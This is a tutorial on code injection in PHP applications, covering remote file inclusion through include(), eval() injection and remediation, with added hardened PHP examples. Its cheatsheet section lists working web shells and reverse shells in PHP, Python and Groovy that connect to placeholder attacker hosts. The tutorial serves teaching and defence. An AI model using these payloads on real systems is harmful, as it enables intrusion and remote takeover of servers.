Code injection is the general term for attack types that consist of injecting code that is then interpreted/executed by the application. This type of attack takes advantage of mismanagement of untrusted data.
Requirements:
- Domain – A domain for testing
- Programming – High programming skills
Responsibility:
In this tutorial we will use hacking techniques, with the only purpose of learning. We do not promote its use for profit or improper purposes. We are not responsible for any damage or impairment that may be generated in the systems used. The responsibility lies entirely with the user of this tutorial.
Knowledge:
- Linux – High
- Programming – High
- Kali Linux – High
- Windows – Not applicable
- Networks – Low
Overall Tutorial Level: High
Ideal for: Developers, Security Engineers, Pentesters
What is code injection?
OWASP defines code injection as a general term for any attack that consists of injecting code that is then interpreted and executed by the application. Such attacks exploit the mishandling of untrusted data and are usually possible because input/output data is not properly validated for:
- allowed characters (standard or custom regular expression classes)
- data format
- expected amount of data
Code injection differs from command injection in that an attacker is limited only by the functionality of the injected language itself. If an attacker can inject and execute PHP code into an application, then he is limited only by PHP’s capabilities. Command injection consists of leveraging existing code to execute commands, usually in the context of a shell.
How does it work?
Scenario 1: PHP include() function
In this scenario, the PHP include() function is in use without input validation.
http://vulnerable-site.com/?path=support.php
To exploit the vulnerability, the payload is hosted on a server the attacker controls and the vulnerable application is made to fetch, include and execute that remote file (this only works if the PHP interpreter allows remote file includes, which is off by default):
http://vulnerable-site.com/?path=http://attacker-website/payload.php
Scenario 2: PHP eval() function
In this example the application uses PHP's eval() function, which offers a quick and convenient way to execute string values as PHP code (often introduced in the early stages of development or for debugging). When its argument is built from user input, it leads directly to code injection. The source code looks as follows:
<?php eval ("echo ".$_REQUEST["parameter"].";"); ?>
The parameter is passed to the URL as follows:
http://vulnerable-site.com/?parameter=value
An attacker who knows that eval() is in use (this can be revealed through error messages) can send the following payload to exploit the vulnerability:
http://vulnerable-site.com/?parameter=value;phpinfo();
If successful, phpinfo() will be executed after echoing the parameter value and will provide information about the configuration details.
In addition, if the system() function is also enabled, the attacker may be able to execute arbitrary operating system commands, as shown below:
http://vulnerable-site.com/?parameter=value;system('ls -l');
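The eval() sink from Scenario 2 next to a hardened handler, as an added example that is not part of the original article: the hardened form treats the request parameter strictly as data (allowlist pattern, length bound, HTML escaping) and never calls eval() at all. The three sample inputs are constructed from the article's URLs; the function names are my own.

```php
<?php
// Added example (not from the original article): the eval() sink from
// Scenario 2 beside a hardened handler that never evaluates user input.
declare(strict_types=1);

// Vulnerable form, reproduced from the article for contrast. It is defined
// here but never called: "value;phpinfo();" becomes PHP source code.
function vulnerable_echo(string $parameter): void
{
    eval("echo " . $parameter . ";");
}

// Hardened form (hypothetical name). The request parameter is data, not code:
// 1. it is bounded in length,
// 2. it must match a strict allowlist pattern (letters, digits, _ and -),
// 3. it is HTML-escaped before output, and eval() is not used at all.
function safe_echo(string $parameter): string
{
    if (strlen($parameter) > 64) {
        throw new InvalidArgumentException('parameter too long');
    }
    if (preg_match('/\A[A-Za-z0-9_-]+\z/', $parameter) !== 1) {
        throw new InvalidArgumentException('parameter contains disallowed characters');
    }
    return htmlspecialchars($parameter, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed sample inputs: the parameter values from the article's URLs.
$samples = [
    'value',
    'value;phpinfo();',
    "value;system('ls -l');",
];

foreach ($samples as $input) {
    try {
        echo 'accepted: ', safe_echo($input), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected (', $e->getMessage(), '): ', $input, PHP_EOL;
    }
}
```

Run with `php safe_echo.php`: only `value` is accepted; both injection attempts are rejected by the allowlist pattern before anything resembling code is built. The important design choice is that the fix removes the interpreter call entirely rather than trying to filter out `;` or `(`, which would leave the sink in place for the next bypass.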
What is the impact of code injection?
If user input containing malicious code is processed insecurely, the vulnerability allows code execution: arbitrary code runs on the server and, from there, system commands can be executed, which amounts to a command injection attack. Depending on the privileges of the application, the attack may yield an interactive shell on the vulnerable system.
Code Injection Cheatsheet
# Execute one command
<?php system("whoami"); ?>
<?php echo shell_exec("nc.exe -nlvp 4444 -C:\Windows\System32\cmd.exe");?>
# Take input from the url parameter.
shell.php?cmd=whoami
<?php system($_GET['cmd']); ?>
<?php echo shell_exec($_GET["cmd"]); ?>
<? passthru($_GET["cmd"]); ?>
php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
<?php $c=$_GET['c']; echo `$c`; ?>
# The same but using passthru
<?php passthru($_GET['cmd']); ?>
# For shell_exec to output the result you need to echo it
<?php echo shell_exec("whoami");?>
# preg_replace(). This is a cool trick
<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>
# Using backticks
<?php $output = `whoami`; echo "<pre>$output</pre>"; ?>
# Using backticks
<?php echo `whoami`; ?>
# upload nc.php
<?php echo system("nc -lvp 81 -e cmd.exe");?>
# upload nc.exe
# run nc.php on browser

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.0.0.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Remediation
To prevent and remedy code injection you can do the following:
- User input validation/sanitization: Data from all potentially untrusted sources must undergo input validation, including not only Internet-facing web clients, but also backend feeds via extranets, from suppliers, partners, vendors or regulators, each of which can be compromised themselves and start sending malformed data.
- Avoid using vulnerable functions in the code: automated tools can also be used to test the code for insecure functions and potential vulnerabilities.
- Note: functions commonly disabled in PHP include exec(), passthru(), shell_exec(), system(), proc_open(), popen(), curl_exec(), curl_multi_exec(), parse_ini_file(), and show_source().
How to avoid code injection?
There are several ways to prevent code injection. Here are some tips that help:
- Examine the application for various escape characters and other special symbols. Make sure that the application only accepts a limited set of values.
- Never pass raw user input to eval(); avoid eval() altogether where possible and rely on the language's own features instead.
- You must know that any data set can have attack code injected into it, so you must treat all data as untrusted. You must know where your data can be manipulated. Code injection is not limited to HTML code and query strings. These code injections can also take place in cookies and data files.
- The next step is to lock down your interpreter. This is only possible if you control the server configuration: limit the interpreter's functionality to the minimum your application needs. For example, if your application does not use the system() function, disable it by listing it in the disable_functions directive.
- Several static code checking tools can help you check your code. They help you find unwanted code and verify that input is validated and sanitized where it should be.
- There are dynamic web vulnerability scanners that can help you scan your application. These scanners will help you make sure that the applications you use are safe from various online attacks.
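Two of the defences above applied to the include() scenario from Scenario 1, as an added example that is not part of the original article: an allowlist router, so the `?path=` value is only ever a lookup key and never a file name or URL, and a runtime check of the interpreter lock-down (remote includes off, shell functions listed in `disable_functions`). The `pages/` directory layout, the `PAGES` map and the function names are assumptions for this example.

```php
<?php
// Added example (not from the original article). Two defences for the
// include() scenario and the interpreter lock-down described above:
// (1) an allowlist router, so the ?path= value is a key, never a file name;
// (2) a runtime check of the php.ini hardening the article recommends.
declare(strict_types=1);

// Assumed layout for this example: page files live in __DIR__ . '/pages'.
const PAGE_DIR = __DIR__ . '/pages';
const PAGES = [
    'support' => 'support.php',
    'contact' => 'contact.php',
];

// Resolve the requested page key to an absolute path, or null if not allowed.
// A URL such as "http://attacker-website/payload.php" can never reach include()
// because the user value is only used to look up a key in PAGES.
function resolve_page(string $requested): ?string
{
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    return PAGE_DIR . '/' . PAGES[$requested];
}

// Report interpreter hardening gaps: remote file access enabled, or one of the
// commonly disabled functions still reachable. An empty array means all passed.
function interpreter_findings(): array
{
    $findings = [];
    // Both directives default to Off / On respectively; remote includes need both.
    foreach (['allow_url_include', 'allow_url_fopen'] as $directive) {
        if (filter_var((string) ini_get($directive), FILTER_VALIDATE_BOOLEAN)) {
            $findings[] = "$directive is enabled";
        }
    }
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    foreach (['exec', 'passthru', 'shell_exec', 'system', 'proc_open', 'popen'] as $fn) {
        if (!in_array($fn, $disabled, true)) {
            $findings[] = "$fn is not in disable_functions";
        }
    }
    return $findings;
}

// Constructed sample requests: the legitimate page key, a raw file name, and
// the remote URL from the article's Scenario 1.
foreach (['support', 'support.php', 'http://attacker-website/payload.php'] as $req) {
    $target = resolve_page($req);
    echo $req, ' => ', $target === null ? 'rejected' : 'include ' . $target, PHP_EOL;
}
foreach (interpreter_findings() as $finding) {
    echo 'hardening gap: ', $finding, PHP_EOL;
}
```

Run it with `php router_check.php`: only the key `support` resolves to a file; the raw file name and the remote URL are rejected without touching the filesystem or the network. The findings list is empty on a host whose php.ini has `allow_url_include = Off`, `allow_url_fopen = Off` and `disable_functions = exec,passthru,shell_exec,system,proc_open,popen`; any line it prints is a configuration gap to close.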
Conclusion
The Internet is full of threats, and new kinds of threats keep appearing; you need to stay protected from these cyber-attacks. Whenever you browse the Internet, you may be the next target of an attack. One such attack is code injection, which compromises the web application you interact with and the data it processes. Fortunately, there are several methods that help you avoid this type of attack. Code injection attacks include Java injection, PHP code injection, HTML code injection and JavaScript injection.
Each of these affects only the functionality that the particular language or code provides. This article has discussed the various aspects of code injection: what it is, how it is carried out, illustrated with worked examples, the methods that help prevent it, and how dangerous it can be to your systems and data.
I hope you find it helpful.